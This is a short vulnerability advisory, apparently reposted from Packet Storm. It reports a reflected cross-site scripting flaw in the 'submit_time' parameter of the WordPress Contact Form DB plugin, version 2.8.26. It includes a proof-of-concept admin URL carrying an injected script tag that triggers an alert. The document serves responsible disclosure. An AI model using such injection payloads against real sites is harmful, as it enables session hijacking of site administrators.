WordPress Contact Form DB plugin version 2.8.26 suffers from a cross site scripting vulnerability.
de9229b23ead09cb3a64e00bd713490b577e5f3a5702afa826468aef0d83674bTitle: WordPress 'Contact Form DB' plugin - XSS
Version: 2.8.26
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/contact-form-7-to-database-extension/
Contacted WordPress: 2015/01/26
==========================================================
## Description:
==========================================================
Saves submitted form data to the database. Export the data to a file or use short codes to display it.
## Reflected XSS:
==========================================================
The 'submit_time' parameter is not properly sanitized before being used.
PoC:
Log in as admin and visit the following url:
http://[URL]/wp-admin/admin.php?page=CF7DBPluginSubmissions&submit_time=%22/%3E%3Cscript%3Ealert%28101%29%3C/script%3E
## Solution
==========================================================
Update to newest version.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed